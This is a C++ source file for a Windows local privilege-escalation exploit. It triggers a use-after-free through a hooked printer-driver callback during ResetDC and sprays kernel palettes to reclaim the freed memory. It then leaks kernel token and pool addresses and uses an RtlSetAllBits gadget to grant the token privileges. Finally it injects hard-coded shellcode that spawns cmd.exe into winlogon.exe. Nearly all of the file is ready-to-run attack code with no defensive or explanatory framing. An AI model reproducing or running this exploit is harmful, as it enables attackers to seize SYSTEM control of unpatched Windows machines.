#include <Windows.h>
#include <stdio.h>
#include <winddi.h>
#include <winternl.h>
#include <tlhelp32.h>
#include <psapi.h>
#pragma comment(lib, "ntdll.lib")
typedef bool(*DrvEnableDriver_t)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded);
typedef DHPDEV(*DrvEnablePDEV_t)(DEVMODEW *pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF *phsurfPatterns, ULONG cjCaps, ULONG *pdevcaps, ULONG cjDevInfo, DEVINFO *pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver);
typedef void(*VoidFunc_t)();
typedef NTSTATUS(*fnNtSetInformationThreadPtr)(HANDLE threadHandle, THREADINFOCLASS threadInformationClass, PVOID threadInformation, ULONG threadInformationLength);


fnNtSetInformationThreadPtr NtSetInformationThread = nullptr;
#define SystemBigPoolInformation 0x42
#define ThreadNameInformation 0x26

DWORD64 Fake_RtlBitMapAddr = 0;
DWORD64 GadgetAddr = 0;

typedef struct
{
	DWORD64 Address;
	DWORD64 PoolSize;
	char PoolTag[4];
	char Padding[4];
} BIG_POOL_INFO, *PBIG_POOL_INFO;
typedef struct _DriverHook
{
	ULONG index;
	FARPROC func;
} DriverHook;

DHPDEV hook_DrvEnablePDEV(DEVMODEW *pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF *phsurfPatterns, ULONG cjCaps, ULONG *pdevcaps, ULONG cjDevInfo, DEVINFO *pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver);

DriverHook driverHooks[] = {
	{ INDEX_DrvEnablePDEV, (FARPROC)hook_DrvEnablePDEV },
};

namespace globals
{
	LPSTR printerName;
	HDC hdc;
	int counter;
	bool should_trigger;
	bool ignore_callbacks;
	VoidFunc_t origDrvFuncs[INDEX_LAST];
}

HPALETTE createPaletteofSize1(int size) {
	int pal_cnt = (size  - 0x90) / 4;
	int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE* lPalette = (LOGPALETTE*)malloc(palsize);
	DWORD64* p = (DWORD64*)((DWORD64)lPalette + 4);
	memset(lPalette, 0xff, palsize);


	p[0x15A-0x8-0x5] = GadgetAddr;

	p[0xE4  - 0x8-0x5] = Fake_RtlBitMapAddr;
	

	lPalette->palNumEntries = pal_cnt;
	lPalette->palVersion = 0x300;
	return CreatePalette(lPalette);
}


DHPDEV hook_DrvEnablePDEV(DEVMODEW *pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF *phsurfPatterns, ULONG cjCaps, ULONG *pdevcaps, ULONG cjDevInfo, DEVINFO *pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver)
{
	puts("[*] Hooked DrvEnablePDEV called");

	DHPDEV res = ((DrvEnablePDEV_t)globals::origDrvFuncs[INDEX_DrvEnablePDEV])(pdm, pwszLogAddress, cPat, phsurfPatterns, cjCaps, pdevcaps, cjDevInfo, pdi, hdev, pwszDeviceName, hDriver);

	// Check if we should trigger the vulnerability
	if (globals::should_trigger == true)
	{
		// We only want to trigger the vulnerability once
		globals::should_trigger = false;

		// Trigger vulnerability with second ResetDC. This will destroy the original
		// device context, while we're still inside of the first ResetDC. This will
		// result in a UAF
		puts("[*] Triggering UAF with second ResetDC");
		HDC tmp_hdc = ResetDCA(globals::hdc, NULL);
		puts("[*] Returned from second ResetDC");

		// This is where we should reclaim the freed memory. For demonstration purposes
		// we are just going to sleep for 30 seconds and hope that someone reclaims and
		// corrupts the freed memory. Open a lot of windows or similar to make a lot of
		// kernel allocations


		for (int i = 0; i < 0x10000; i++)
		{


			createPaletteofSize1(0xe20);
		}




		//for (int i = 1; i < 31; i++)
		//{
		//	Sleep(1000);
		//	printf("[*] Counting down...: %d\n", 31 - i);
		//}

		puts("[*] Get ready for DoS");
		//Sleep(1000);
	}

	return res;
}

bool SetupUsermodeCallbackHook()
{
	/* Find and hook a printer's usermode callbacks */
	DrvEnableDriver_t DrvEnableDriver;
	VoidFunc_t DrvDisableDriver;
	DWORD pcbNeeded, pcbReturned;
	PRINTER_INFO_4A *pPrinterEnum, *printerInfo;
	HANDLE hPrinter;
	DRIVER_INFO_2A *driverInfo;
	HMODULE hModule;
	DRVENABLEDATA drvEnableData;
	DWORD lpflOldProtect, _lpflOldProtect;
	bool res;

	// Find available printers
	EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &pcbNeeded, &pcbReturned);

	if (pcbNeeded <= 0)
	{
		puts("[-] Failed to find any available printers");
		return false;
	}

	pPrinterEnum = (PRINTER_INFO_4A *)malloc(pcbNeeded);

	if (pPrinterEnum == NULL)
	{
		puts("[-] Failed to allocate buffer for pPrinterEnum");
		return false;
	}

	res = EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, (LPBYTE)pPrinterEnum, pcbNeeded, &pcbNeeded, &pcbReturned);

	if (res == false || pcbReturned <= 0)
	{
		puts("[-] Failed to enumerate printers");
		return false;
	}

	// Loop over printers
	for (DWORD i = 0; i < pcbReturned; i++)
	{
		printerInfo = &pPrinterEnum[0];

		printf("[*] Using printer: %s\n", printerInfo->pPrinterName);

		// Open printer
		res = OpenPrinterA(printerInfo->pPrinterName, &hPrinter, NULL);
		if (!res)
		{
			puts("[-] Failed to open printer");
			continue;
		}

		printf("[+] Opened printer: %s\n", printerInfo->pPrinterName);
		globals::printerName = _strdup(printerInfo->pPrinterName);

		// Get the printer driver
		GetPrinterDriverA(hPrinter, NULL, 2, NULL, 0, &pcbNeeded);

		driverInfo = (DRIVER_INFO_2A *)malloc(pcbNeeded);

		res = GetPrinterDriverA(hPrinter, NULL, 2, (LPBYTE)driverInfo, pcbNeeded, &pcbNeeded);

		if (res == false)
		{
			printf("[-] Failed to get printer driver\n");
			continue;
		}

		printf("[*] Driver DLL: %s\n", driverInfo->pDriverPath);

		// Load the printer driver into memory
		hModule = LoadLibraryExA(driverInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);

		if (hModule == NULL)
		{
			printf("[-] Failed to load printer driver\n");
			continue;
		}

		// Get printer driver's DrvEnableDriver and DrvDisableDriver
		DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hModule, "DrvEnableDriver");
		DrvDisableDriver = (VoidFunc_t)GetProcAddress(hModule, "DrvDisableDriver");

		if (DrvEnableDriver == NULL || DrvDisableDriver == NULL)
		{
			printf("[-] Failed to get exported functions from driver\n");
			continue;
		}

		// Call DrvEnableDriver to get the printer driver's usermode callback table
		res = DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(DRVENABLEDATA), &drvEnableData);

		if (res == false)
		{
			printf("[-] Failed to enable driver\n");
			continue;
		}

		puts("[+] Enabled printer driver");

		// Unprotect the driver's usermode callback table, such that we can overwrite entries
		res = VirtualProtect(drvEnableData.pdrvfn, drvEnableData.c * sizeof(PFN), PAGE_READWRITE, &lpflOldProtect);

		if (res == false)
		{
			puts("[-] Failed to unprotect printer driver's usermode callback table");
			continue;
		}

		// Loop over hooks
		for (int i = 0; i < sizeof(driverHooks) / sizeof(DriverHook); i++)
		{
			// Loop over driver's usermode callback table
			for (DWORD n = 0; n < drvEnableData.c; n++)
			{
				ULONG iFunc = drvEnableData.pdrvfn[n].iFunc;

				// Check if hook INDEX matches entry INDEX
				if (driverHooks[i].index == iFunc)
				{
					// Saved original function pointer
					globals::origDrvFuncs[iFunc] = (VoidFunc_t)drvEnableData.pdrvfn[n].pfn;
					// Overwrite function pointer with hook function pointer
					drvEnableData.pdrvfn[n].pfn = (PFN)driverHooks[i].func;
					break;
				}
			}
		}

		// Disable driver
		DrvDisableDriver();

		// Restore protections for driver's usermode callback table
		VirtualProtect(drvEnableData.pdrvfn, drvEnableData.c * sizeof(PFN), lpflOldProtect, &_lpflOldProtect);

		return true;
	}

	return false;
}



typedef struct _SYSTEM_MODULE_ENTRY_INFO
{
	HANDLE Section;
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY_INFO, *PSYSTEM_MODULE_ENTRY_INFO;

typedef struct _SYSTEM_MODULE_INFORMATION
{
	ULONG NumberOfModules;
	SYSTEM_MODULE_ENTRY_INFO Modules[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

#define  SystemExtendedHandleInformation 64
#define SystemHandleInformation 0x10
#define SystemModuleInformation  0xb
DWORD64 GetModuleAddr(const char* modName)
{
	PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20);

	DWORD outBuffer = 0;
	NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer);

	if (status == ((NTSTATUS)0xC0000004L))//STATUS_INFO_LENGTH_MISMATCH
	{
		free(buffer);
		buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer);
		status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer);
	}

	if (!buffer)
	{
		printf("[-] NtQuerySystemInformation error\n");
		return 0;
	}

	for (unsigned int i = 0; i < buffer->NumberOfModules; i++)
	{
		PVOID kernelImageBase = buffer->Modules[i].ImageBase;
		PCHAR kernelImage = (PCHAR)buffer->Modules[i].FullPathName;
		if (_stricmp(kernelImage, modName) == 0)
		{
			free(buffer);
			return (DWORD64)kernelImageBase;
		}
	}
	free(buffer);
	return 0;
}
DWORD64 GetGadgetAddr(const char* name)
{
	DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe");
	HMODULE mod = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
	if (!mod)
	{
		printf("[-] leaking ntoskrnl version\n");
		return 0;
	}
	DWORD64 offset = (DWORD64)GetProcAddress(mod, name);
	DWORD64 returnValue = base + offset - (DWORD64)mod;
	//printf("[+] FunAddr: %p\n", (DWORD64)returnValue);
	FreeLibrary(mod);
	return returnValue;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
	USHORT UniqueProcessId;
	USHORT CreatorBackTraceIndex;
	UCHAR ObjectTypeIndex;
	UCHAR HandleAttributes;
	USHORT HandleValue;
	PVOID Object;
	ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;


typedef struct _SYSTEM_HANDLE_INFORMATION {
	ULONG NumberOfHandles;
	SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
DWORD64 GetKernelPointer(HANDLE handle, DWORD type)
{
	PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(0x20);

	DWORD outBuffer = 0;
	NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer);

	if (status == (NTSTATUS)0xC0000004L)
	{
		free(buffer);
		buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(outBuffer);
		status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer);
	}

	if (!buffer)
	{
		printf("[-] NtQuerySystemInformation error \n");
		return 0;
	}

	for (size_t i = 0; i < buffer->NumberOfHandles; i++)
	{
		DWORD objTypeNumber = buffer->Handles[i].ObjectTypeIndex;

		if (buffer->Handles[i].UniqueProcessId == GetCurrentProcessId() && buffer->Handles[i].ObjectTypeIndex == type)
		{
			if (handle == (HANDLE)buffer->Handles[i].HandleValue)
			{
				DWORD64 object = (DWORD64)buffer->Handles[i].Object;
				free(buffer);
				return object;
			}
		}
	}
	printf("[-] handle not found\n");
	free(buffer);
	return 0;
}
LPVOID ntoskrnlBase = nullptr;
DWORD64 LeakEporcessKtoken()
{

	LPVOID drivers[1024] = {};
	DWORD cbNeeded = NULL;
	ntoskrnlBase = nullptr;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers))
	{
		if (drivers[0])
		{
			ntoskrnlBase = drivers[0];
			printf("[-] ntoskrnlBase=%p\n", ntoskrnlBase);
		}
	}
	else
	{
		printf("[-] EnumDeviceDrivers failed; array size needed is %d\n", cbNeeded / sizeof(LPVOID));
	}

	HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
	if (!proc)
	{
		printf("[-] OpenProcess failed\n");
		return 0;
	}

	HANDLE token = 0;
	if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token))
	{
		printf("[-] OpenProcessToken failed\n");
		return 0;
	}

	DWORD64 ktoken = 0;
	for (int i = 0; i < 0x100; i++)
	{
		ktoken = GetKernelPointer(token, 0x5);

		if (ktoken != NULL)
		{
			break;
		}

	}
	return ktoken;
}
int  fnExploit(int lpParameter)
{


	do
	{
		Sleep(0x500000);


	} while (true);


}

DWORD64 LeakTheadNamePoolAddr(DWORD64 ktoken)
{
	DWORD dwThreadID = 0;

	HANDLE	hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)fnExploit, 0, 0, &dwThreadID);

	printf("[-] hTread==%p,dwThreadID==%d\n", hThread, dwThreadID);

	USHORT dwSize = 4096;

	LPVOID lpMessageToStore = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_READWRITE);


	memset(lpMessageToStore, 0x41, 0x20);

	//BitMapHeader->SizeOfBitMap
	*(DWORD64*)lpMessageToStore = 0x80;

	//BitMapHeader->Buffer
	*(DWORD64*)((DWORD64)lpMessageToStore + 8) = ktoken;

	UNICODE_STRING target = {};



	target.Length = dwSize;
	target.MaximumLength = 0xffff;
	target.Buffer = (PWSTR)lpMessageToStore;


	HRESULT hRes = NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &target, 0x10);


	DWORD dwBufSize = 1024 * 1024;
	DWORD dwOutSize;
	LPVOID pBuffer = LocalAlloc(LPTR, dwBufSize);

	hRes = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, pBuffer, dwBufSize, &dwOutSize);

	DWORD dwExpectedSize = target.Length + sizeof(UNICODE_STRING);

	ULONG_PTR StartAddress = (ULONG_PTR)pBuffer;
	ULONG_PTR EndAddress = StartAddress + 8 + *((PDWORD)StartAddress) * sizeof(BIG_POOL_INFO);
	ULONG_PTR ptr = StartAddress + 8;
	while (ptr < EndAddress)
	{
		PBIG_POOL_INFO info = (PBIG_POOL_INFO)ptr;
		//printf("Name:%s Size:%llx Address:%llx\n", info->PoolTag, info->PoolSize, info->Address);
		if (strncmp(info->PoolTag, "ThNm", 4) == 0 && dwExpectedSize == info->PoolSize)
		{
			return (((ULONG_PTR)info->Address) & 0xfffffffffffffff0) + sizeof(UNICODE_STRING);
		}
		ptr += sizeof(BIG_POOL_INFO);
	}

	printf("[-] Lead Pool Addr Failed\n");

	return NULL;
}
// run cmd.exe
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \
"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \
"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \
"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \
"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \
"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \
"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \
"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \
"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \
"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \
"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \
"\x78\x65\x00";

void InjectToWinlogon()
{
	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	int pid = -1;
	if (Process32First(snapshot, &entry))
	{
		while (Process32Next(snapshot, &entry))
		{
			if (wcscmp(entry.szExeFile, L"winlogon.exe") == 0)
			{
				pid = entry.th32ProcessID;
				break;
			}
		}
	}

	CloseHandle(snapshot);

	if (pid < 0)
	{
		printf("Could not find process\n");
		return;
	}

	HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	if (!h)
	{
		printf("Could not open process: %x", GetLastError());
		return;
	}

	void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (!buffer)
	{
		printf("[-] VirtualAllocEx failed\n");
	}

	if (!buffer)
	{
		printf("[-] remote allocation failed");
		return;
	}

	if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0))
	{
		printf("[-] WriteProcessMemory failed");
		return;
	}

	HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);

	if (hthread == INVALID_HANDLE_VALUE)
	{
		printf("[-] CreateRemoteThread failed");
		return;
	}
}


int main()
{

	NtSetInformationThread = (fnNtSetInformationThreadPtr)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtSetInformationThread");


	if (NtSetInformationThread == NULL)
	{
		printf("[-] Getting NtSetInformationThread Failed\n");
	}


	DWORD64 ktoken = LeakEporcessKtoken();

	printf("[-] ktoken addr =%p\n", ktoken);

	 GadgetAddr = GetGadgetAddr("RtlSetAllBits");

	printf("[-] GadgetAddr addr =%p\n", GadgetAddr);


	 Fake_RtlBitMapAddr = LeakTheadNamePoolAddr(ktoken + 0x40);

	printf("[-] Fake_RtlBitMapAddr=%p\n", Fake_RtlBitMapAddr);



	bool res = false;

	// Setup hook for usermode callbacks on a printer
	res = SetupUsermodeCallbackHook();

	if (res == false)
	{
		printf("[-] Failed to setup usermode callback\n");
	}

	// Create new device context for printer with driver's hooked callbacks
	globals::hdc = CreateDCA(NULL, globals::printerName, NULL, NULL);
	if (globals::hdc == NULL)
	{
		puts("[-] Failed to create device context");
		return -1;
	}

	// Trigger the vulnerability
	// This will internally call `hdcOpenDCW` which will call our usermode callback
	// From here we will call ResetDC again to trigger the UAF
	globals::should_trigger = true;
	ResetDC(globals::hdc, NULL);


	printf("[-] InjectToWinlogon\n");

	InjectToWinlogon();


	puts("[*] Done");

	return 0;
}